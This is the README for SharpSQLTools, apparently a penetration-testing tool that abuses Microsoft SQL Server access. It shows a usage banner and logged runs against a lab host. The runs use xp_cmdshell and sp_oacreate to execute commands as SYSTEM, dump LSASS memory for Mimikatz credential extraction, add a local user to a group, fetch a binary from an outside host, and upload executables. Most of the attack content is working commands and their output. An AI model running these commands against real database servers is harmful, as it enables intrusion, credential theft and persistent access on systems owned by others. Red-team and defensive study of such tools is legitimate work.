和RcoIl一起写的小工具,可上传下载文件,xp_cmdshell与sp_oacreate双回显和clr加载程序集执行相应操作。功能参考mssqlproxy,由于目前C#还不知如何获取SQL连接的socket,该项目中的mssqlproxy功能目前尚未实现。另外,Clr不适用于一些与线程进程相关的操作。
>SharpSQLTools.exe _____ _ _____ ____ _ _______ _ / ____| | / ____|/ __ \| | |__ __| | | | (___ | |__ __ _ _ __ _ __| (___ | | | | | | | ___ ___ | |___ \___ \| '_ \ / _` | '__| '_ \\___ \| | | | | | |/ _ \ / _ \| / __| ____) | | | | (_| | | | |_) |___) | |__| | |____| | (_) | (_) | \__ \ |_____/|_| |_|\__,_|_| | .__/_____/ \___\_\______|_|\___/ \___/|_|___/ | | |_| by Rcoil & UknowUsage:SharpSQLTools target username password - interactive consoleSharpSQLTools target username password module command - non-interactive consoleModule:enable_xp_cmdshell - you know what it meansdisable_xp_cmdshell - you know what it meansxp_cmdshell {cmd} - executes cmd using xp_cmdshellsp_oacreate {cmd} - executes cmd using sp_oacreateenable_ole - you know what it meansdisable_ole - you know what it meansupload {local} {remote} - upload a local file to a remote path (OLE required)download {remote} {local} - download a remote file to a local pathenable_clr - you know what it meansdisable_clr - you know what it meansinstall_clr - create assembly and procedureuninstall_clr - drop clrclr_dumplsass - dumplsass by clrclr_adduser {user} {pass} - add user by clrclr_download {url} {path} - download file from url by clrexit - terminates the server process (and this session)
支持交互模式与非交互模式,交互模式直接跟目标,用户名和密码即可。非交互模式直接跟模块与命令。
SharpSQLTools target username password - interactive consoleSharpSQLTools target username password module command - non-interactive console
λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX xp_cmdshell whoami[*] Database connection is successful!nt authority\system
λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX sp_oacreate whoami[*] Database connection is successful![+] c:\windows\system32\cmd.exe /c whoami > C:\Users\Public\Downloads\1611131759069.txt[+] Reading C:\Users\Public\Downloads\1611131759069.txtnt authority\system[+] Deleting C:\Users\Public\Downloads\1611131759069.txt
λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX clr_dumplsass[*] Database connection is successful![*] Dumping lsass (488) to C:\Windows\Temp\debug488.out[+] Dump successful![*] Compressing C:\Windows\Temp\debug488.out to C:\Windows\Temp\debug488.bin gzip file[X] Output file 'C:\Windows\Temp\debug488.bin' already exists, removing[*] Deleting C:\Windows\Temp\debug488.out[+] Dumping completed. Rename file to "debug488.gz" to decompress.[*] Operating System : Windows Server 2008 R2 Standard[*] Architecture : AMD64[*] Use "sekurlsa::minidump debug.out" "sekurlsa::logonPasswords full" on the same OS/arch
λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX clr_adduser test1234 1qaz@WSX[*] Database connection is successful![*] Adding User success[*] Adding Group Member success
λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX clr_download "http://192.168.28.185:8001/clac.bin" "c:\Users\Public\Downloads\test.bin"[*] Database connection is successful![*] Download success
λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX upload C:\Users\Pentest\Desktop\test\usc.exe c:\Users\Public\Downloads\11.exe[*] Database connection is successful![*] Uploading 'C:\Users\Pentest\Desktop\test\usc.exe' to 'c:\Users\Public\Downloads\11.exe'...[+] 7-1 Upload completed[+] 7-2 Upload completed[+] 7-3 Upload completed[+] 7-4 Upload completed[+] 7-5 Upload completed[+] 7-6 Upload completed[+] 7-7 Upload completed[+] copy /b c:\Users\Public\Downloads\11.exe_x.config_txt c:\Users\Public\Downloads\11.exe[+] del c:\Users\Public\Downloads\*.config_txt[*] 'C:\Users\Pentest\Desktop\test\usc.exe' Upload completed
λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX download c:\Users\Public\Downloads\t.txt C:\Users\Pentest\Desktop\test\t.txt[*] Database connection is successful![*] Downloading 'c:\Users\Public\Downloads\t.txt' to 'C:\Users\Pentest\Desktop\test\t.txt'...[*] 'c:\Users\Public\Downloads\t.txt' Download completed
https://github.com/uknowsec/SharpSQLTools